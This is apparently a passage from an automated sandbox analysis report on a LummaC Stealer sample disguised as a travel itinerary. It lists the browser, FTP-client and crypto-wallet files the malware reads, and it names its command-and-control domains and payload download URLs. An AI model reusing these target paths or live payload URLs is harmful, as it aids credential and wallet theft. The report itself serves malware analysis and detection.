Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.json Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\FTPbox Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\FTPRush Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB Jump to behavior
Searches for user specific document files
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents\AQRFEVRTGL Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents\AQRFEVRTGL Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents\BXAJUJAOEO Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents\BXAJUJAOEO Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents\NWCXBPIUYI Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents\NWCXBPIUYI Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents\AQRFEVRTGL Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents\AQRFEVRTGL Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents\BXAJUJAOEO Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents\BXAJUJAOEO Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents\CZQKSDDMWR Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents\CZQKSDDMWR Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents\DQOFHVHTMG Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents\DQOFHVHTMG Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents\NWCXBPIUYI Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents\NWCXBPIUYI Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents\AQRFEVRTGL Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents\AQRFEVRTGL Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents\BXAJUJAOEO Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents\BXAJUJAOEO Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents\CZQKSDDMWR Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents\CZQKSDDMWR Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents\HMPPSXQPQV Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents\HMPPSXQPQV Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents\AQRFEVRTGL Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents\AQRFEVRTGL Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents\BXAJUJAOEO Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents\BXAJUJAOEO Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents\CZQKSDDMWR Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents\CZQKSDDMWR Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents\DQOFHVHTMG Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents\DQOFHVHTMG Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents\HMPPSXQPQV Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents\HMPPSXQPQV Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents\NWCXBPIUYI Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents\NWCXBPIUYI Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents\AQRFEVRTGL Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents\AQRFEVRTGL Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents\CZQKSDDMWR Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents\CZQKSDDMWR Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents\DQOFHVHTMG Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents\DQOFHVHTMG Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents\HMPPSXQPQV Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents\HMPPSXQPQV Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents\NWCXBPIUYI Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents\NWCXBPIUYI Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents\AQRFEVRTGL Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents\AQRFEVRTGL Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents\BXAJUJAOEO Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents\BXAJUJAOEO Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents\CZQKSDDMWR Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents\CZQKSDDMWR Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents\DQOFHVHTMG Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents\DQOFHVHTMG Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents\HMPPSXQPQV Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents\HMPPSXQPQV Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents\AQRFEVRTGL Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents\AQRFEVRTGL Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents\BXAJUJAOEO Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents\BXAJUJAOEO Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents\CZQKSDDMWR Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents\CZQKSDDMWR Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents\NWCXBPIUYI Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Directory queried: C:\Users\user\Documents\NWCXBPIUYI Jump to behavior

Remote Access Functionality
barindex
Yara detected LummaC Stealer
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1579293 Sample: Navan - Itinerary.pdf.scr.exe Startdate: 21/12/2024 Architecture: WINDOWS Score: 100 23 stem-mellows.cyou 2->23 25 x1.i.lencr.org 2->25 27 4 other IPs or domains 2->27 33 Suricata IDS alerts for network traffic 2->33 35 Found malware configuration 2->35 37 Multi AV Scanner detection for submitted file 2->37 39 6 other signatures 2->39 9 Navan - Itinerary.pdf.scr.exe 3 15 2->9         started        signatures3 process4 dnsIp5 29 raw.githubusercontent.com 185.199.110.133, 443, 49700, 49701 FASTLYUS Netherlands 9->29 41 Writes to foreign memory regions 9->41 43 Allocates memory in foreign processes 9->43 45 Injects a PE file into a foreign processes 9->45 47 LummaC encrypted strings found 9->47 13 RegSvcs.exe 9->13         started        17 Acrobat.exe 71 9->17         started        signatures6 process7 dnsIp8 31 discokeyus.lat 172.67.197.170, 443, 49715, 49727 CLOUDFLARENETUS United States 13->31 49 Found many strings related to Crypto-Wallets (likely being stolen) 13->49 51 Tries to harvest and steal ftp login credentials 13->51 53 Tries to harvest and steal browser information (history, passwords, etc) 13->53 55 Tries to steal Crypto Currency Wallets 13->55 19 AcroCEF.exe 108 17->19         started        signatures9 process10 process11 21 AcroCEF.exe 4 19->21         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.199.110.133
 raw.githubusercontent.com Netherlands
54113 FASTLYUS false
172.67.197.170
 discokeyus.lat United States
13335 CLOUDFLARENETUS false

Contacted Domains

Name IP Active
bg.microsoft.map.fastly.net 199.232.210.172 true
raw.githubusercontent.com 185.199.110.133 true
discokeyus.lat 172.67.197.170 true
x1.i.lencr.org unknown unknown
grannyejh.lat unknown unknown
stem-mellows.cyou unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
necklacebudi.lat false
    		high
    sustainskelet.lat false
      		high
      crosshuaht.lat false
        		high
        rapeflowwj.lat false
          		high
          https://discokeyus.lat/api false
            		high
            grannyejh.lat false
              		high
              aspecteirs.lat false
                		high
                energyaffai.lat false
                  		high
                  discokeyus.lat false
                    		high
                    https://raw.githubusercontent.com/AromatcHEBUYRKOS/chekingbebra/refs/heads/main/millliiiiion false
                      		high
                      https://raw.githubusercontent.com/AromatcHEBUYRKOS/chekingbebra/refs/heads/main/NavanItinerary.pdf false
                        		high
                        stem-mellows.cyou true
                          		unknown